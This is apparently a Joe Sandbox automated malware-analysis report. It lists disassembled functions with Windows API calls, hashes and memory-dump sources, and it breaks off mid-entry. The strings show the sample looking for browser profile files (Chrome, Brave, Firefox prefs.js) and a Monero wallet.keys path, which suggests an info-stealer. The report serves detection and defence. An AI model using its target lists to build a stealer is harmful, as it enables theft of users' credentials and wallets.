                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 3334442632-726946144
                          • Opcode ID: 4457c7ccdd77a548dea6bcb03aff6c06d2b6f9c4574517f70cce42385ad7e56f
                          • Instruction ID: eb3bcdae0a022a120b09685673cd1bc2d7804caa9997727199a3cbffc4fed535
                          • Opcode Fuzzy Hash: 4457c7ccdd77a548dea6bcb03aff6c06d2b6f9c4574517f70cce42385ad7e56f
                          • Instruction Fuzzy Hash: DD4243B19101089BCB14FB64DC56EFE7379EF44300F418558FA0E96195EE74AB49CBB2
                          Function 00DF4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 00DF492C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00DF4943
                          • StrCmpCA.SHLWAPI(?,00E00FDC), ref: 00DF4971
                          • StrCmpCA.SHLWAPI(?,00E00FE0), ref: 00DF4987
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00DF4B7D
                          • FindClose.KERNEL32(000000FF), ref: 00DF4B92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s$%s\%s$%s\*
                          • API String ID: 180737720-445461498
                          • Opcode ID: 380095d4a5dbc04a29b275ca1f286f20f4c62eb3ae7b897dddab061f427a95b0
                          • Instruction ID: 339d44da82cef558c8e10f6d5863ea18bb12036d7335520e5a9c0009a4c74efe
                          • Opcode Fuzzy Hash: 380095d4a5dbc04a29b275ca1f286f20f4c62eb3ae7b897dddab061f427a95b0
                          • Instruction Fuzzy Hash: 136123B5600219ABCB34EFA0DC45FFA7378BB48700F048588E64A96145EF75DB858FA1
                          Function 00DF4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00DF4580
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DF4587
                          • wsprintfA.USER32 ref: 00DF45A6
                          • FindFirstFileA.KERNEL32(?,?), ref: 00DF45BD
                          • StrCmpCA.SHLWAPI(?,00E00FC4), ref: 00DF45EB
                          • StrCmpCA.SHLWAPI(?,00E00FC8), ref: 00DF4601
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00DF468B
                          • FindClose.KERNEL32(000000FF), ref: 00DF46A0
                          • lstrcat.KERNEL32(?,00840CA0), ref: 00DF46C5
                          • lstrcat.KERNEL32(?,0083F268), ref: 00DF46D8
                          • lstrlen.KERNEL32(?), ref: 00DF46E5
                          • lstrlen.KERNEL32(?), ref: 00DF46F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                          • String ID: %s\%s$%s\*
                          • API String ID: 671575355-2848263008
                          • Opcode ID: 14f02d25dfa0eb84993d2f095c318582f8ab19344154ba1c993c61b0dddf7f2e
                          • Instruction ID: bf4c2445f627a5dd8345e98d77664f5aeb5024504d2b6fc93d951e502e36dea7
                          • Opcode Fuzzy Hash: 14f02d25dfa0eb84993d2f095c318582f8ab19344154ba1c993c61b0dddf7f2e
                          • Instruction Fuzzy Hash: EC5123B56002189BCB74EF70DC89FEE7378AB58300F408598E64A96184EF75DA848FB1
                          Function 00DF3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 00DF3EC3
                          • FindFirstFileA.KERNEL32(?,?), ref: 00DF3EDA
                          • StrCmpCA.SHLWAPI(?,00E00FAC), ref: 00DF3F08
                          • StrCmpCA.SHLWAPI(?,00E00FB0), ref: 00DF3F1E
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00DF406C
                          • FindClose.KERNEL32(000000FF), ref: 00DF4081
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 180737720-4073750446
                          • Opcode ID: e8520b4b8f4837c8cb3ada460dbeb4ebe3c79c894f8b8331a47ee5a618d61eeb
                          • Instruction ID: 2c512ea902ea89844b1e84b1cf480036bb931db533f3a7c04085db185045886c
                          • Opcode Fuzzy Hash: e8520b4b8f4837c8cb3ada460dbeb4ebe3c79c894f8b8331a47ee5a618d61eeb
                          • Instruction Fuzzy Hash: 24510FB6A00219ABCB34EBA0DC85EFA7378BB44300F548588F75996044DE75EB858F71
                          Function 00DEED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 00DEED3E
                          • FindFirstFileA.KERNEL32(?,?), ref: 00DEED55
                          • StrCmpCA.SHLWAPI(?,00E01538), ref: 00DEEDAB
                          • StrCmpCA.SHLWAPI(?,00E0153C), ref: 00DEEDC1
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00DEF2AE
                          • FindClose.KERNEL32(000000FF), ref: 00DEF2C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 180737720-1013718255
                          • Opcode ID: a2fbf02b856bdcb9171906bbdd39cbc8d372ae890657982c64cce3e087f5df3b
                          • Instruction ID: 71b2db4655cba358bf1d4ebcbb55f5ba147223b21216aa91ceb102cf5cd7107e
                          • Opcode Fuzzy Hash: a2fbf02b856bdcb9171906bbdd39cbc8d372ae890657982c64cce3e087f5df3b
                          • Instruction Fuzzy Hash: CFE10FB191111C9ADB24FB64CC52EFE7338EF54340F4581A9B60E66096EE706B8ACF71
                          Function 00DEF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                            • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E015B8,00E00D96), ref: 00DEF71E
                          • StrCmpCA.SHLWAPI(?,00E015BC), ref: 00DEF76F
                          • StrCmpCA.SHLWAPI(?,00E015C0), ref: 00DEF785
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00DEFAB1
                          • FindClose.KERNEL32(000000FF), ref: 00DEFAC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: prefs.js
                          • API String ID: 3334442632-3783873740
                          • Opcode ID: 510cc5aec4019a64ab1a5c43cb20a3cd950a5faf1e5969ab966134be55378e64
                          • Instruction ID: b4b45876fc47bef5d8aad456dfd2339c5e6b95d1847a2a80951bbe4b2c223884
                          • Opcode Fuzzy Hash: 510cc5aec4019a64ab1a5c43cb20a3cd950a5faf1e5969ab966134be55378e64
                          • Instruction Fuzzy Hash: A2B131B19001189BCB24FF64DC95AFD7379EF54300F41C1A8A50E9A185EE706B49CBB1
                          Function 011B2E2B Relevance: 15.4, Strings: 11, Instructions: 1630COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Gr$12&}$?E#a$Xbkw$ZN1'$^__$igO]$v;$!${}}$|,^w$/w
                          • API String ID: 0-2742724478
                          • Opcode ID: d93f72923cc64e00bd76540348d9f29dd8f5d09c1812936b069db19197a9d216
                          • Instruction ID: c6cac108c955ea07d54f6e742fc1c8393a2645921b7f3c7efe08b90ec8d56faa
                          • Opcode Fuzzy Hash: d93f72923cc64e00bd76540348d9f29dd8f5d09c1812936b069db19197a9d216
                          • Instruction Fuzzy Hash: A3B2E6B360C314AFE3046E2DEC85A6AFBE9EF94620F1A493DE6C4C3744E67558018796
                          Function 00DE16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E0510C,?,?,?,00E051B4,?,?,00000000,?,00000000), ref: 00DE1923
                          • StrCmpCA.SHLWAPI(?,00E0525C), ref: 00DE1973
                          • StrCmpCA.SHLWAPI(?,00E05304), ref: 00DE1989
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00DE1D40
                          • DeleteFileA.KERNEL32(00000000), ref: 00DE1DCA
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00DE1E20
                          • FindClose.KERNEL32(000000FF), ref: 00DE1E32
                            • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                            • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 1415058207-1173974218
                          • Opcode ID: 982d35051947c182fc0cb814baf96276e9814ac73be09fe8e8c82d211706fce8
                          • Instruction ID: c46180d4676962ebe346c86c4c92947ff804344e076e73af1ef532fc7e9f4c6d
                          • Opcode Fuzzy Hash: 982d35051947c182fc0cb814baf96276e9814ac73be09fe8e8c82d211706fce8
                          • Instruction Fuzzy Hash: 5612FBB191011C9ACB15FB64CC96AFE7378EF54340F4581A9A60E66091EF706F89CFB1
                          Function 00DEDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00E00C2E), ref: 00DEDE5E
                          • StrCmpCA.SHLWAPI(?,00E014C8), ref: 00DEDEAE
                          • StrCmpCA.SHLWAPI(?,00E014CC), ref: 00DEDEC4
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00DEE3E0
                          • FindClose.KERNEL32(000000FF), ref: 00DEE3F2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                          • String ID: \*.*
                          • API String ID: 2325840235-1173974218
                          • Opcode ID: c997866e808f1e9350298de319211b44953c27662ce2057ae87e2b42c7fa0ad6
                          • Instruction ID: 776fec258f9195a11cb7f4d3ecbbe8e61c86cc9f27cef1966d55fcdfef305382
                          • Opcode Fuzzy Hash: c997866e808f1e9350298de319211b44953c27662ce2057ae87e2b42c7fa0ad6
                          • Instruction Fuzzy Hash: 03F1CEB191012C9ACB25FB64CC95AFE7338EF14340F8581E9A50E66095EF706B89CF71
                          Function 00DEDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                            • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E014B0,00E00C2A), ref: 00DEDAEB
                          • StrCmpCA.SHLWAPI(?,00E014B4), ref: 00DEDB33
                          • StrCmpCA.SHLWAPI(?,00E014B8), ref: 00DEDB49
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00DEDDCC
                          • FindClose.KERNEL32(000000FF), ref: 00DEDDDE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID:
                          • API String ID: 3334442632-0
                          • Opcode ID: 1933c7bd46935d337dd3ce7b6e7a626794bd32cd3bf5f6a4f7193d5396bc1aa3
                          • Instruction ID: ed6aa1e9f34d9809eb4dc882e21a7f5dad8716b5b7646231b2bfd773e1a64d4e
